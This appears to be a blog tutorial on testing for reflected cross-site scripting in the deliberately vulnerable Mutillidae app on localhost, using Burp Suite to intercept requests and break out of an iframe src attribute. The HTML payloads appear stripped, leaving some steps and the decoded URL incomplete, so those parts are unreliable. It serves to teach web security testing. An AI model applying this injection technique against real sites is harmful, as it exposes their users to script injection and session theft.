In my previous article we have seen which are the different ways of
fuzzing including suffix and prefix. We used those fuzzing techniques in order
to find error messages in web application. Now as we know how to fuzz, we will
use that skill to find XSS generally known as cross site scripting.
Testing For
XSS
Without wasting much time, let us go to, Document viewer page under A3
Cross site scripting(XSS) module. In there are various method of exploiting XSS
but first we will choose simple method which is HTTP attribute.
As soon as you open page, see what does it tell to you. In this case, we
are provided four different types of options to see the documents on any web
page. One of four is downloadable document from that web application and other
3 documents are showing in below box.
Let us keep it as it is and intercept the request after submitting
document. Intercepted request is as follows:
GET /chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101
Firefox/27.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection: keep-alive
By checking into PARAM section, we can identify that PathToDocument is the main parameter from which we are able to see
the original content of the text which is displayed into the box. So let us
remove the value of that parameter and let us try to fuzz it with our skills.
First of all I am removing whole red highlighted line form previous header. Now
I will put first simple text ‘Jonnybravo’
in order to see if my request gets successfully processed or server is giving
me an error. So I am just making change in first line of header which is as follows:
GET
/chintan/index.php?page=document-viewer.php&PathToDocument=jonnybravo&document-viewer-php-submit-button=View+Document
HTTP/1.1
Now after forwarding request I have got 200 OK responses from server and
I have intercepted response as well in burp suite, so that I can see HTML
coding of response page in order to find our input which is jonnybravo.
There are 2 matches which show my given input. So now I come to know that
what to keep in mind while crafting an XSS exploit. First jonnybravo is just a
text between quotes, but at another place we have iframe tag in which there is
a src(Source) attribute and the value of that jonnybravo.
We can check here for XSS by crafting custom payload by arranging proper
suffix and prefix in jonnybravo input. In order to test XSS we cannot execute
our payload directly at this place in the middle of iframe. We have to break
this tag and we can inject our payload somewhere outside before or after iframe
tag. If we inject our payload somewhere out in iframe, then it will be lying in
HTML code only so It will be executed unless and if some other security
techniques are not used.
Show Time
Now here is our target.
First thing we need to do is to break the context. As you all are
familiar with HTML. Here src=”jonnybravo” is there. So to break the context we
need to give “jonnybravo
as input. So that 1st “ of default code and 2nd “ of our
input together works and it will assume that there is blank input from client
side. So now our code is something like below.
Then as iframe tag has been started, we need to close it in order to give
our payload injection outside the iframe. So then we will give closing tag in
our input which is “jonnybravo. So now our new code is something like below.
" width="700px"
height="500px">
As you can conclude from above line that iframe has been started and
finished by our input now we are outside of the iframe tag and we can give our
payload here. So we will try to inject javascript alert. So for that payload is
. But it all comes after our given
input. So our new and final input is as follows:
Payload :“jonnybravo
.
Now our new code(request) is as below.
width="700px" height="500px">
As you can see that iframe tag is closed before our payload gets executed
and whatever written after my payload(height width and closing iframe tag) will
not make any difference as HTML will only consider it as a normal code lying
out there as that code is incomplete so it won’t be executed. So I gave all
this input in the request which I intercepted so my new request is as follows.
GET
/chintan/index.php?page=document-viewer.php&PathToDocument=
“jonnybravo
&document-viewer-php-submit-button=View+Document
HTTP/1.1
Host:
localhost
User-Agent:
Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:
en-US,en;q=0.5
Accept-Encoding:
gzip, deflate
Referer:
http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie:
showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection:
keep-alive
To
illustrate the work up to now, let us intercept the response of this request
and let us check the coding where does momma is lying in the code.
From code,
you can analyze that iframe tag is closed when we give
in our
input and it started script tag from the next line so that script tag was our
another input which we gave it together. It is not mandatory that you need to
give “ first followed by jonnybravo. You can also craft a payload as follow.
Payload :Jonnybravo”
If I give
above payload I get response like below figure.
Here it will execute the javascript along with the iframe as well. First
when it executes our payload you won’t be able to see the iframe box, but as
soon as you click on “ok”button, and
when the complete page gets load you will able to see the iframe box as shown
in below figure.
To verify that it is an iframe box, I have pressed F12 to see the runtime
coding of the page and I am using inspect element option provided by the
firebug, it is not actually a firebug add-on but it is inbuilt version of Firefox
which I am using. It shows that I am inspecting one element and by watching at
html code it can be confirmed that it is
my jonnybravo iframe source.
“It depends on your html skills
and the basic knowledge of encoding and decoding of special characters. If you
know that in depth you can bypass the filters, however OWASP is providing XSS
filter cheetsheet which is available on their official website in case you
need. It explains encoding and decoding techniques along with the filter
bypassing techniques.”
Use Burp
Decoder
Many times URL you might see, will not be so much easy to understand and recognize
by looking into that. It might be encoded server might be using encoding
techniques for at least special characters. In such situation if you cannot
understand URL, simply put that into the burp decoder.
How-To
Encoded URL :
http:%2f %2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork.php%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document
Let us
assume that we are having this URL which is in encoded form and we are not able
to understand what does it tell. Simply copy and paste this URL in burp decoder
and click on “Smart Decode” if burp
knows the decoding method it will decode the URL. I have decoded this URL and
the simplified form of this URL is as follows:
Decoded
URL:
Conclusion
So this is how cross site scripting attack also known as XSS is hatted by
attackers to the web application. This attack is used to bypass the access
controls. It varies from the nature of the security which is implemented by the
web application developer. XSS also depends on the behavior of the input data
which is being handled by the web application.
References
http://www.maximumpc.com/files/u21826/teaser_xss.png
No comments:
Post a Comment